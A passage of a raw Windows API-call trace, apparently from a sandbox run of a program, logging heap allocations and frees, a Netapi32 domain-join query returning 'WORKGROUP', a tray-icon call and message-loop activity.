hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0156.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0156.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba438 [0156.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a10 [0156.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19e0 [0156.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba450 [0156.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba438 | out: hHeap=0x8a0000) returned 1 [0156.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a10 | out: hHeap=0x8a0000) returned 1 [0156.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba450 | out: hHeap=0x8a0000) returned 1 [0156.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19e0 | out: hHeap=0x8a0000) returned 1 [0156.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19e0 [0156.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba450 [0156.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a10 [0156.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0156.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba438 [0156.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba450 | out: hHeap=0x8a0000) returned 1 [0156.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a10 | out: hHeap=0x8a0000) returned 1 [0156.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba438 | out: hHeap=0x8a0000) returned 1 [0156.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0156.181] LoadLibraryW (lpLibFileName="Netapi32.dll") returned 0x74af0000 [0156.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0156.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0156.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetGetJoinInformation", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0156.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x16) returned 0x90d280 [0156.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetGetJoinInformation", cchWideChar=22, lpMultiByteStr=0x90d280, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetGetJoinInformation", lpUsedDefaultChar=0x0) returned 22 [0156.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0156.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0156.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d280 | out: hHeap=0x8a0000) returned 1 [0156.962] GetProcAddress (hModule=0x74af0000, lpProcName="NetGetJoinInformation") returned 0x74a92c3f [0156.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0156.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0156.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0156.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0156.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a10 [0156.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19c0 [0156.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20002) returned 0x8e7398 [0156.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0156.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a10 | out: hHeap=0x8a0000) returned 1 [0156.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19c0 | out: hHeap=0x8a0000) returned 1 [0156.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0156.963] NetGetJoinInformation (in: lpServer="", lpNameBuffer=0x87eac0, BufferType=0x87ead8 | out: lpNameBuffer=0x87eac0*="WORKGROUP", BufferType=0x87ead8) returned 0x0 [0156.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0156.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x9091f8 [0156.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0156.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0156.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba150 [0156.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0156.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0156.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0156.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0156.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba150 | out: hHeap=0x8a0000) returned 1 [0156.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba150 [0156.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0156.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0156.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0156.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e7398 | out: hHeap=0x8a0000) returned 1 [0156.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba108 [0156.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0156.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0156.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0156.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0156.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0156.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0156.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0156.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0156.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0156.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0156.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0156.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0156.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0156.974] FreeLibrary (hLibModule=0x74af0000) returned 1 [0156.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0156.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0156.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19e0 | out: hHeap=0x8a0000) returned 1 [0156.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b80 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba630 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba648 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba558 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba510 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4b0 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba528 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4c8 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba480 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba468 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0156.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0156.980] PeekMessageW (in: lpMsg=0x87f124, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f124) returned 1 [0156.980] TranslateMessage (lpMsg=0x87f124) returned 0 [0156.980] DispatchMessageW (lpMsg=0x87f124) returned 0x0 [0156.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x90ab20 [0156.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0156.980] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e7c0) returned 1 [0156.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ab20 | out: hHeap=0x8a0000) returned 1 [0156.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0156.982] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0156.982] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0156.982] PeekMessageW (in: lpMsg=0x87f124, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f124) returned 0 [0156.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0156.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x90ab20 [0156.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0156.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ab20 | out: hHeap=0x8a0000) returned 1 [0156.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0156.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0156.983] PeekMessageW (in: lpMsg=0x87f124, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f124) returned 0 [0156.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0156.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0156.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0156.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0156.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0156.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0156.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba468 [0156.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0156.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba468 | out: hHeap=0x8a0000) returned 1 [0156.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19e0 [0156.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19e0 | out: hHeap=0x8a0000) returned 1 [0156.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0156.983] PeekMessageW (in: lpMsg=0x87f124, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f124) returned 0 [0156.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de808 [0156.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba468 [0156.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0156.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba480 [0156.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4c8 [0156.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19e0 [0156.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4c8 | out: hHeap=0x8a0000) returned 1 [0156.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0156.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4c8 [0156.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0156.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0156.984] CharUpperBuffW (in: lpsz="_BUFFERSIZE", cchLength=0xb | out: lpsz="_BUFFERSIZE") returned 0xb [0156.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0156.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de880 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba528 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1950 [0156.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1950 | out: hHeap=0x8a0000) returned 1 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4b0 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1950 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba510 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0156.984] PeekMessageW (in: lpMsg=0x87ead4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ead4) returned 0 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8d0 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba558 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1940 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba648 [0156.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0156.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba648 | out: hHeap=0x8a0000) returned 1 [0156.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0156.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba648 [0156.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1920 [0156.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0156.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0156.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0156.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1920 [0156.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba630 [0156.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0156.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0156.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1920 [0156.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b80 [0156.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0156.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0156.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1920 [0156.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0156.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0156.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba360 [0156.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1920 [0156.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0156.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0156.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1920 [0156.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba300 [0156.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0156.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba318 [0156.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1920 [0156.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0156.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1920 [0156.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba438 [0156.986] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0156.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba450 [0156.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1910 [0156.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0156.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0156.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba450 | out: hHeap=0x8a0000) returned 1 [0156.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1910 | out: hHeap=0x8a0000) returned 1 [0156.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0156.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0156.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0156.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0156.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0156.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1910 [0156.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0156.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba450 [0156.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0156.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1910 | out: hHeap=0x8a0000) returned 1 [0156.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba450 | out: hHeap=0x8a0000) returned 1 [0156.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0156.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0156.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba450 [0156.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1910 [0156.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18e0 [0156.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0156.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba450 | out: hHeap=0x8a0000) returned 1 [0156.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1910 | out: hHeap=0x8a0000) returned 1 [0156.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0156.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0156.987] LoadLibraryW (lpLibFileName="Netapi32.dll") returned 0x74ac0000 [0157.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba090 [0157.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18e0 [0157.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferSize", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0157.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d440 [0157.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferSize", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetApiBufferSize", lpUsedDefaultChar=0x0) returned 17 [0157.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba090 | out: hHeap=0x8a0000) returned 1 [0157.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de948 [0157.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0157.001] GetProcAddress (hModule=0x74ac0000, lpProcName="NetApiBufferSize") returned 0x74b03789 [0157.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de948 | out: hHeap=0x8a0000) returned 1 [0157.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0157.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0157.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1910 | out: hHeap=0x8a0000) returned 1 [0157.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de948 | out: hHeap=0x8a0000) 